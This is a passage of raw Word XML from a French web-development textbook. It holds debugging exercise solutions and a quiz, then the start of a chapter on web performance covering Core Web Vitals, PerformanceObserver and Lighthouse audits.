          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> à la ligne 42.</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Identifiez la variable nulle.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Déterminez pourquoi la sélection échoue.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Proposez une correction robuste.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 32.2 — Écrire trois tests utiles</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Testez une fonction de remise progressive.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Cas sans remise.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Cas à la limite du seuil.</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Cas avec valeur invalide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 32.3 — Reproduire un bogue en isolation</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Un total affiché est faux uniquement pour certaines commandes.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Extrayez la fonction de calcul.</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Testez avec les données réelles.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Comparez avec le résultat attendu à la main.</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32.1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Cause probable : le script s'exécute avant que l'élément existe</w:t>
        <w:br/>
        <w:t>// ou le sélecteur ne correspond à rien</w:t>
        <w:br/>
        <w:br/>
        <w:t>const champ = document.querySelector("#courriel");</w:t>
        <w:br/>
        <w:t>if (!champ) {</w:t>
        <w:br/>
        <w:t>console.warn("Champ #courriel absent : le script ne s'applique pas à cette</w:t>
        <w:br/>
        <w:t xml:space="preserve">    page.");</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  champ.addEventListener("input", valider);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>querySelector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> renvoie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> si aucun élément ne correspond ; appeler </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> produit l'erreur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un script chargé sans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> s'exécute avant que le corps du document ne soit analysé : c'est la cause la plus fréquente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 32.2</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export function remise(total) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!Number.isFinite(total) || total &lt; 0) return 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (total &gt;= 100) return total * 0.9;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (total &gt;= 50) return total * 0.95;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return total;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>// tests</w:t>
        <w:br/>
        <w:t>test("aucune remise sous 50", () =&gt; expect(remise(49.99)).toBe(49.99));</w:t>
        <w:br/>
        <w:t>test("remise de 5 % à 50", () =&gt; expect(remise(50)).toBe(47.5));</w:t>
        <w:br/>
        <w:t>test("remise de 10 % à 100", () =&gt; expect(remise(100)).toBe(90));</w:t>
        <w:br/>
        <w:t>test("valeur invalide", () =&gt; expect(remise(-5)).toBe(0));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les seuils sont les endroits où les erreurs de comparaison (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contre </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) se produisent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le cas invalide évite qu'une entrée inattendue propage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans tout le calcul.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 32.3</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Reproduction minimale</w:t>
        <w:br/>
        <w:t>const lignes = [</w:t>
        <w:br/>
        <w:t xml:space="preserve">  { prix: 19.99, quantite: 3 },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  { prix: 5.5, quantite: 2 },</w:t>
        <w:br/>
        <w:t>];</w:t>
        <w:br/>
        <w:br/>
        <w:t>const total = lignes.reduce((t, l) =&gt; t + l.prix * l.quantite, 0);</w:t>
        <w:br/>
        <w:t>console.log(total);        // 70.97 (virgule flottante : 70.97000000000001)</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Correction : calculer en centimes</w:t>
        <w:br/>
        <w:t>const totalCentimes = lignes.reduce(</w:t>
        <w:br/>
        <w:t xml:space="preserve">  (t, l) =&gt; t + Math.round(l.prix * 100) * l.quantite, 0</w:t>
        <w:br/>
        <w:t>);</w:t>
        <w:br/>
        <w:t>console.log(totalCentimes / 100);   // 70.97</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'addition de flottants binaires produit des décimales parasites, invisibles à l'affichage mais sensibles aux comparaisons.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Calculer en centiers entiers supprime le problème à la racine.</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Par où commence un débogage méthodique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Changer le code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Reproduire le défaut de façon fiable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Redémarrer le serveur</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 xml:space="preserve">Ajouter des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>console.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> partout</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 contient une pile d'appels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Les variables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La suite des fonctions appelées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Les erreurs précédentes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 code source complet</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À quoi sert un test de régression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À mesurer la vitesse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À empêcher le retour d'un défaut corrigé</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À documenter l'API</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À remplacer les tests unitaires</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 mesure la couverture de code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La qualité du code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Les lignes exécutées par les tests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 nombre de bogues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La vitesse d'exécution</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Quel point d'arrêt choisir dans une boucle de mille itérations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 point normal</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Un point conditionnel</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Aucun</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 xml:space="preserve">Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>console.log</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Sans reproduction fiable, aucune correction ne peut être vérifiée.</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Elle indique le chemin d'appel jusqu'à l'erreur, du plus récent au plus ancien.</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Il reproduit le défaut d'origine pour garantir qu'il ne réapparaît pas.</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C'est un indicateur d'exécution, pas une preuve d'absence de défaut.</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La condition permet de suspendre uniquement sur l'itération problématique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>33. Performance web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mesurer ce que l'utilisateur ressent, puis réduire le poids, le délai et le travail du navigateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 32</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Interpréter les Core Web Vitals.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Réduire le poids des images, polices et scripts.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Optimiser le chemin critique de rendu.</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Mettre en cache et différer le non-critique.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Mesurer avant et après chaque optimisation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>33.1 Mesurer ce qui compte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La performance perçue se mesure en jalons : quand le contenu apparaît, quand il devient lisible, quand il cesse de bouger. Trois indicateurs résument ces jalons.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.104 — Cinq jalons et leurs seuils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195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Indicateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="450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Mesure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Seuil correct</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1953"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>LCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Affichage du plus grand élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>≤ 2,5 s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="195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INP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="450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Réactivité aux interactions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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 200 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1953"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stabilité visuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>≤ 0,1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="195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TTFB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="450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Premier octet reçu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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 800 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1953"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>FCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Premier contenu affiché</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>≤ 1,8 s</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CORE WEB VITALS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Trois indicateurs (LCP, INP, CLS) retenus par Google pour décrire l'expérience réelle : rapidité d'affichage, réactivité et stabilité.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3365500"/>
            <wp:docPr id="43" name="Picture 43"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f41.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3365500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.41 — Le chargement d'une page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Observer les jalons depuis la page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Mesurer dans le navigateur réel</w:t>
        <w:br/>
        <w:t>const observateur = new PerformanceObserver((liste) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  for (const entree of liste.getEntries()) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    console.log(entree.name, entree.startTime, entree.value);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:t>observateur.observe({ type: "largest-contentful-paint", buffered: true });</w:t>
        <w:br/>
        <w:t>observateur.observe({ type: "layout-shift", buffered: true });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un rapport complet en une commande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Audit local avec Lighthouse</w:t>
        <w:br/>
        <w:t>npx lighthouse https://exemple.fr --view</w:t>
        <w:br/>
        <w:t>npx lighthouse http://localhost:8080 --preset=desktop --output=json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>33.2 Le poids des images</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les images représentent souvent plus de la moitié du poids d'une page. Quatre décisions réduisent ce poids sans perte visible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.105 — Cinq leviers sur les images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90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Décision</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Gain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3906"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
